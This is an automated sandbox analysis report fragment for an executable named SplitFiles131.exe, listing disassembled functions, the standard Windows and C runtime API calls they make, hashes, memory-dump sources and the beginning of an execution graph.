                                          • Instruction Fuzzy Hash: 98F03736600129BBCF222FD2EC05D9A3F26FB443B0B444025F90D96531C73288709BD9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001), ref: 1000E5A8
                                          • GetLastError.KERNEL32(?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001,?,00000001,?,1000C9F7,10008E0A), ref: 1000E5B4
                                            • Part of subcall function 1000E57A: CloseHandle.KERNEL32(FFFFFFFE,1000E5C4,?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001,?,00000001), ref: 1000E58A
                                          • ___initconout.LIBCMT ref: 1000E5C4
                                            • Part of subcall function 1000E53C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000E56B,1000D975,00000001,?,1000C4AB,?,?,00000001,?), ref: 1000E54F
                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001,?), ref: 1000E5D9
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: db033fb1b874636e85d330483b63d37f63c04bcfd1e8b3716c06f70c47e2a96d
                                          • Instruction ID: b377c5219626dc8a0c0ad289bd514fd869925b16e60f045967f437c28a647ed1
                                          • Opcode Fuzzy Hash: db033fb1b874636e85d330483b63d37f63c04bcfd1e8b3716c06f70c47e2a96d
                                          • Instruction Fuzzy Hash: F4F03036540569BBEF12AFA1CC49A8A3F66FB083E1F018410FE48A5131DA32CD20DBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SleepConditionVariableCS.KERNELBASE(?,0040EF6D,00000064), ref: 0040EFF4
                                          • LeaveCriticalSection.KERNEL32(004504FC,004063FC,?,0040EF6D,00000064,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EFFE
                                          • WaitForSingleObjectEx.KERNEL32(004063FC,00000000,?,0040EF6D,00000064,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040F00F
                                          • EnterCriticalSection.KERNEL32(004504FC,?,0040EF6D,00000064,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040F016
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                          • String ID:
                                          • API String ID: 3269011525-0
                                          • Opcode ID: f64a1fe2d3c08a56fcd9346185c77cb8d93b1cbc53ddc582fa2c2fd8cd520f41
                                          • Instruction ID: 4c9c1218df18ba92a0a868e9c99513ef249696396432c8a4148075b9a22993ac
                                          • Opcode Fuzzy Hash: f64a1fe2d3c08a56fcd9346185c77cb8d93b1cbc53ddc582fa2c2fd8cd520f41
                                          • Instruction Fuzzy Hash: 0AE09235681225FBCA212B51EC08A9E7F18AF06752B004032FE0566262CB7568119BDD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 0041AC70
                                            • Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
                                            • Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0
                                          • _free.LIBCMT ref: 0041AC83
                                          • _free.LIBCMT ref: 0041AC94
                                          • _free.LIBCMT ref: 0041ACA5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 7600757227941bb7c95799b95531e21e679b1f58566f426ab12c79b805c51534
                                          • Instruction ID: 302bd469a5a2dc94dd6d614bbecc9892323fc590e190cb025f464d2d07f9e9ff
                                          • Opcode Fuzzy Hash: 7600757227941bb7c95799b95531e21e679b1f58566f426ab12c79b805c51534
                                          • Instruction Fuzzy Hash: F8E04F7F410360BF960A2F56BC51685BA25B75570AB4002ABFC0436233CB759051AB8D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 100075AD
                                            • Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
                                            • Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729
                                          • _free.LIBCMT ref: 100075C0
                                          • _free.LIBCMT ref: 100075D1
                                          • _free.LIBCMT ref: 100075E2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 560e9729131f36da597d803f7365e1613d92c0d7e1160fc99f91f24202a3e63e
                                          • Instruction ID: 11fb011ea0374647b44fdc306d41bcbb37fa874d581b786af2f79b002bb734ee
                                          • Opcode Fuzzy Hash: 560e9729131f36da597d803f7365e1613d92c0d7e1160fc99f91f24202a3e63e
                                          • Instruction Fuzzy Hash: 82E0EC79825130EBFB52AF149CC28493E66FB58B803A5C00AF86812239D732D7529FA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00403CD6
                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00403D70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ___std_exception_copy___std_exception_destroy
                                          • String ID: `=@
                                          • API String ID: 2970364248-2879527708
                                          • Opcode ID: 020cfde67c81afc4d71945b4c587ce0ffd10af12ed6690544abac246daa8197c
                                          • Instruction ID: 13c42e399c2991b93d131e87cfc8b99e3a8f7b3fd8cb1136b6e867019d48ab5a
                                          • Opcode Fuzzy Hash: 020cfde67c81afc4d71945b4c587ce0ffd10af12ed6690544abac246daa8197c
                                          • Instruction Fuzzy Hash: 1A718271A002589BDB04CF99C881BDDFBB5EF49314F14822EE805B7385D779AA44CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00419AED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: a582e46973c46f5eef58ff1d0f172840d36d42b9c83d8389a540df618c71c77d
                                          • Instruction ID: 71e70a3d575cb920f3d1b965d95ae51b65b63d53711f17dc4a41893a615c4c2c
                                          • Opcode Fuzzy Hash: a582e46973c46f5eef58ff1d0f172840d36d42b9c83d8389a540df618c71c77d
                                          • Instruction Fuzzy Hash: 62517D71B0810195CB12BF14F9613AB77B0EB40B52F7448ABE4C5423A9EA3C8ED59A4E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00424479: GetOEMCP.KERNEL32(00000000,004246EA,00000000,00418194,?,?,00418194,?,00000000), ref: 004244A4
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,51F44589,?,?,?,00424731,?,00000000,00000000,?,?), ref: 0042493C
                                          • GetCPInfo.KERNEL32(00000000,1GB,?,?,00424731,?,00000000,00000000,?,?,?,?,?,?,00418194,?), ref: 0042497E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID: 1GB
                                          • API String ID: 546120528-4244811723
                                          • Opcode ID: aee94ae5ee01cc59593c3c75f0455c1e87f97389cb9c7ba2e998998210576ad8
                                          • Instruction ID: aacb25a9507ad1c205b6f49fc7500e8a924766a2b9ce2c8cd014c0b8cff2f0c3
                                          • Opcode Fuzzy Hash: aee94ae5ee01cc59593c3c75f0455c1e87f97389cb9c7ba2e998998210576ad8
                                          • Instruction Fuzzy Hash: F55125B0B002648EDB21DF76E4407BBBBE4EFD1304F94406FD08687251D7789582CB49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCPInfo.KERNEL32(0000FDE9,?,0000000C,00000000,00000000), ref: 00424581
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Info
                                          • String ID: $tIB
                                          • API String ID: 1807457897-3257070604
                                          • Opcode ID: f173a03a340fb3b3c2833dae6a272a5206f12199cae729be784c9ef2206b4439
                                          • Instruction ID: 4a28d2029068e78a01aac7d99e26ab956f5ac8d9ba36b8a867b1e1f291c49a90
                                          • Opcode Fuzzy Hash: f173a03a340fb3b3c2833dae6a272a5206f12199cae729be784c9ef2206b4439
                                          • Instruction Fuzzy Hash: 54418E70704268ABDB218B18DD84BFB77FDDB96308FA404EEE5C687142D27C9A85CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                          • API String ID: 0-4111602209
                                          • Opcode ID: 0e731db7584ad60d578d779bbaf5b01c679ed323d4b1edda6f57c3d6e2435286
                                          • Instruction ID: b8ab9d9bf59b97dbdceff1942ea396bbaab855526052e627d1082f7e5706c01d
                                          • Opcode Fuzzy Hash: 0e731db7584ad60d578d779bbaf5b01c679ed323d4b1edda6f57c3d6e2435286
                                          • Instruction Fuzzy Hash: C041B671A01218AFCB16DF9ADC85ADFBBB8EB85314F10016BF81097341D7789A91CB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                          • API String ID: 0-4111602209
                                          • Opcode ID: 1ece5218b2422689d95aac8363c4354a6b0412c233e2753c981cf0bd8d1cf806
                                          • Instruction ID: 646097fc6b5d669f55448d5f467022a3e50ec9bcd71d7e0a9af30093925523d1
                                          • Opcode Fuzzy Hash: 1ece5218b2422689d95aac8363c4354a6b0412c233e2753c981cf0bd8d1cf806
                                          • Instruction Fuzzy Hash: 8A41AF79E00295AFEB21CB99DC8199EBBFAEB897D0B304066F90497205D7719F41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004124E1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 2118026453-2084237596
                                          • Opcode ID: 188dd02d7599aa30b8f70c009784331bdac1aa484947d381b84c6db6c6d716c1
                                          • Instruction ID: ad6c17696073472ca42aa8dfa0ec8590c08af3ebdb16e25686bd643ee096a47e
                                          • Opcode Fuzzy Hash: 188dd02d7599aa30b8f70c009784331bdac1aa484947d381b84c6db6c6d716c1
                                          • Instruction Fuzzy Hash: 2A416A71900109BFCF16DF94CE91AEEBBB6FF48304F18806AF905A7251D3799AA0DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 10004FF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: EncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 2118026453-2084237596
                                          • Opcode ID: 4d7ed7e1a438cb125378e558f69cca30710cf17c4f75dbaa5e6bce22c7dbe1d5
                                          • Instruction ID: d582f20fa4c8ccc8f50c3cacdc6089d2bedb682b0b99dde694d4e72c5554890f
                                          • Opcode Fuzzy Hash: 4d7ed7e1a438cb125378e558f69cca30710cf17c4f75dbaa5e6bce22c7dbe1d5
                                          • Instruction Fuzzy Hash: EB41AC71900209EFEF16CF94CC81AEE7BB5FF48385F158099F909A7265D736AA50CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00403F3B
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403F8A
                                            • Part of subcall function 0040E386: _Yarn.LIBCPMT ref: 0040E3A5
                                            • Part of subcall function 0040E386: _Yarn.LIBCPMT ref: 0040E3C9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                          • String ID: bad locale name
                                          • API String ID: 1908188788-1405518554
                                          • Opcode ID: 0698450c758f5080945dd03671431322a62a555b97a6e35c8aa63d649f4640dc
                                          • Instruction ID: 0e1965beb74f9ff9c4f9f037bd33cd57e17261f8de89b9630023cdf888844aec
                                          • Opcode Fuzzy Hash: 0698450c758f5080945dd03671431322a62a555b97a6e35c8aa63d649f4640dc
                                          • Instruction Fuzzy Hash: E0119171904B849FD320CF69C901747BBF4EB19714F004A2EE849D3B81D7B9A504CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
                                            • Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90
                                          • __Init_thread_footer.LIBCMT ref: 0040931D
                                            • Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
                                            • Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
                                            • Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                          • String ID: CGVZ$YA
                                          • API String ID: 2296764815-3168216772
                                          • Opcode ID: 6b3f2edf672ee7163d045f6b3c2ee22b3a52908d77dd1c4be6e8844974e40f80
                                          • Instruction ID: e9a20a430b0b6afe83743553c5755eaecc9671b6d7f01568723836dade792edc
                                          • Opcode Fuzzy Hash: 6b3f2edf672ee7163d045f6b3c2ee22b3a52908d77dd1c4be6e8844974e40f80
                                          • Instruction Fuzzy Hash: 94012679E003089BCB20DFA5EC4159DB3B0EB09711F5006BEE90677392E778AA05CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
                                            • Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90
                                          • __Init_thread_footer.LIBCMT ref: 004094E0
                                            • Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
                                            • Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
                                            • Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                          • String ID: A@$F^
                                          • API String ID: 2296764815-756130965
                                          • Opcode ID: b3d270ef5b96a7ee1581324bb411de95daac9417756f6a0bdbb33eb6c345495d
                                          • Instruction ID: 6c7a6d0756c4f162afa1c2070c0bcf59aef1f867ba74d1dc7902e0ff42b24005
                                          • Opcode Fuzzy Hash: b3d270ef5b96a7ee1581324bb411de95daac9417756f6a0bdbb33eb6c345495d
                                          • Instruction Fuzzy Hash: F901D239A003489BC710DFA9ED42599B370EB55701F5001BAE909673A2D678EA48CB1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetOEMCP.KERNEL32(00000000,004246EA,00000000,00418194,?,?,00418194,?,00000000), ref: 004244A4
                                          • GetACP.KERNEL32(00000000,004246EA,00000000,00418194,?,?,00418194,?,00000000), ref: 004244BB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: FB
                                          • API String ID: 0-3670039715
                                          • Opcode ID: 68332179f40c49eab4e966d4ddaa84e174b0e6e01ad48db93ae2ad237c21ce19
                                          • Instruction ID: 521155ed4fd04c10d09fec07b2a217d09ec56201c3508306b013a50f1c28b22d
                                          • Opcode Fuzzy Hash: 68332179f40c49eab4e966d4ddaa84e174b0e6e01ad48db93ae2ad237c21ce19
                                          • Instruction Fuzzy Hash: 14F0C230600220DBCB14EB64E8487BD3770FB8133AFA00755E034872E2CBB49941CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00403DAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: `=@$`=@
                                          • API String ID: 2659868963-2373854662
                                          • Opcode ID: 4b50160e959331e57da2a4db2d37d7e516b6b0fad8e09b272cf4e57e40a249b1
                                          • Instruction ID: c33fae4a20f9ec275494595788b59750feb4b5a2f93437c52e8352574578c9ea
                                          • Opcode Fuzzy Hash: 4b50160e959331e57da2a4db2d37d7e516b6b0fad8e09b272cf4e57e40a249b1
                                          • Instruction Fuzzy Hash: 2CF0ACB6A10716AB8714DF59D440882F7ECFF59320714C62BE519D7B00F7B4A954CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:3.2%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:1618
                                          Total number of Limit Nodes:29
                                          execution_graph 5646 1010d1 5647 1010d6 5646->5647 5650 10366b 5647->5650 5649 1010e1 5651 103691 5650->5651 5652 103677 5650->5652 5651->5649 5652->5651 5657 1045cb 5652->5657 5663 104267 GetLastError 5657->5663 5659 103681 5660 10450e 5659->5660 5883 1044aa 5660->5883 5662 10368c 5662->5649 5664 104284 5663->5664 5665 10427e 5663->5665 5685 10428a SetLastError 5664->5685 5691 106a7b 5664->5691 5686 106a3c 5665->5686 5672 1042d1 5675 106a7b __dosmaperr 6 API calls 5672->5675 5673 1042ba 5674 106a7b __dosmaperr 6 API calls 5673->5674 5676 1042c8 5674->5676 5677 1042dd 5675->5677 5703 10463b 5676->5703 5678 1042e1 5677->5678 5679 1042f2 5677->5679 5680 106a7b __dosmaperr 6 API calls 5678->5680 5709 103f3e 5679->5709 5680->5676 5684 10463b _free 12 API calls 5684->5685 5685->5659 5714 1068dc 5686->5714 5688 106a58 5689 106a61 5688->5689 5690 106a73 TlsGetValue 5688->5690 5689->5664 5692 1068dc __dosmaperr 5 API calls 5691->5692 5693 106a97 5692->5693 5694 1042a2 5693->5694 5695 106ab5 TlsSetValue 5693->5695 5694->5685 5696 1045de 5694->5696 5701 1045eb __dosmaperr 5696->5701 5697 10462b 5700 1045cb __dosmaperr 13 API calls 5697->5700 5698 104616 RtlAllocateHeap 5699 1042b2 5698->5699 5698->5701 5699->5672 5699->5673 5700->5699 5701->5697 5701->5698 5727 106d27 5701->5727 5704 10466f __dosmaperr 5703->5704 5705 104646 HeapFree 5703->5705 5704->5685 5705->5704 5706 10465b 5705->5706 5707 1045cb __dosmaperr 12 API calls 5706->5707 5708 104661 GetLastError 5707->5708 5708->5704 5741 103dd2 5709->5741 5715 10690a 5714->5715 5719 106906 __dosmaperr 5714->5719 5715->5719 5720 106815 5715->5720 5718 106924 GetProcAddress 5718->5719 5719->5688 5724 106826 ___vcrt_InitializeCriticalSectionEx 5720->5724 5721 1068d1 5721->5718 5721->5719 5722 106844 LoadLibraryExW 5723 10685f GetLastError 5722->5723 5722->5724 5723->5724 5724->5721 5724->5722 5725 1068ba FreeLibrary 5724->5725 5726 106892 LoadLibraryExW 5724->5726 5725->5724 5726->5724 5730 106d54 5727->5730 5731 106d60 ___scrt_is_nonwritable_in_current_image 5730->5731 5736 105ae8 EnterCriticalSection 5731->5736 5733 106d6b 5737 106da7 5733->5737 5736->5733 5740 105b30 LeaveCriticalSection 5737->5740 5739 106d32 5739->5701 5740->5739 5742 103dde ___scrt_is_nonwritable_in_current_image 5741->5742 5755 105ae8 EnterCriticalSection 5742->5755 5744 103de8 5756 103e18 5744->5756 5747 103ee4 5748 103ef0 ___scrt_is_nonwritable_in_current_image 5747->5748 5760 105ae8 EnterCriticalSection 5748->5760 5750 103efa 5761 1040c5 5750->5761 5752 103f12 5765 103f32 5752->5765 5755->5744 5759 105b30 LeaveCriticalSection 5756->5759 5758 103e06 5758->5747 5759->5758 5760->5750 5762 1040d4 __fassign 5761->5762 5764 1040fb __fassign 5761->5764 5762->5764 5768 1064aa 5762->5768 5764->5752 5882 105b30 LeaveCriticalSection 5765->5882 5767 103f20 5767->5684 5769 10652a 5768->5769 5772 1064c0 5768->5772 5770 106578 5769->5770 5773 10463b _free 14 API calls 5769->5773 5836 10661b 5770->5836 5772->5769 5774 1064f3 5772->5774 5780 10463b _free 14 API calls 5772->5780 5775 10654c 5773->5775 5776 106515 5774->5776 5781 10463b _free 14 API calls 5774->5781 5777 10463b _free 14 API calls 5775->5777 5779 10463b _free 14 API calls 5776->5779 5778 10655f 5777->5778 5782 10463b _free 14 API calls 5778->5782 5783 10651f 5779->5783 5785 1064e8 5780->5785 5787 10650a 5781->5787 5788 10656d 5782->5788 5789 10463b _free 14 API calls 5783->5789 5784 1065e6 5790 10463b _free 14 API calls 5784->5790 5796 106015 5785->5796 5786 106586 5786->5784 5792 10463b 14 API calls _free 5786->5792 5824 106113 5787->5824 5794 10463b _free 14 API calls 5788->5794 5789->5769 5795 1065ec 5790->5795 5792->5786 5794->5770 5795->5764 5797 106026 5796->5797 5823 10610f 5796->5823 5798 106037 5797->5798 5799 10463b _free 14 API calls 5797->5799 5800 106049 5798->5800 5801 10463b _free 14 API calls 5798->5801 5799->5798 5802 10605b 5800->5802 5803 10463b _free 14 API calls 5800->5803 5801->5800 5804 10606d 5802->5804 5805 10463b _free 14 API calls 5802->5805 5803->5802 5806 10607f 5804->5806 5807 10463b _free 14 API calls 5804->5807 5805->5804 5808 106091 5806->5808 5809 10463b _free 14 API calls 5806->5809 5807->5806 5810 1060a3 5808->5810 5811 10463b _free 14 API calls 